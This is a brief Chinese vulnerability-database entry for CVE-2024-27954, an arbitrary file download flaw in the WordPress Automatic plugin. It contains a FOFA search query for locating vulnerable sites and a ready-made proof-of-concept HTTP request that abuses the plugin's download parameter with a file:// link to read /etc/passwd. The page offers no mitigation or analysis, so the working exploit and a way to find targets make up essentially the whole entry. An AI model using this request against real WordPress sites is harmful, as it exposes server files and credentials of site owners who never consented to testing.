WordPress Automatic Plugin任意文件下载漏洞(CVE-2024-27954)

本文最后更新于 2024年8月27日上午

WordPress Automatic Plugin任意文件下载漏洞(CVE-2024-27954)

fofa

1	`"/wp-content/plugins/wp-automatic"`

poc

GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

8053915951936ca9109843fe4c581ce4

漏洞知识库

WookTeam轻量级的团队在线协作系统接口searchinfo存在SQL注入漏洞上一篇

WordPress-Automatic插件存在SQL注入漏洞(CVE-2024-27956) 下一篇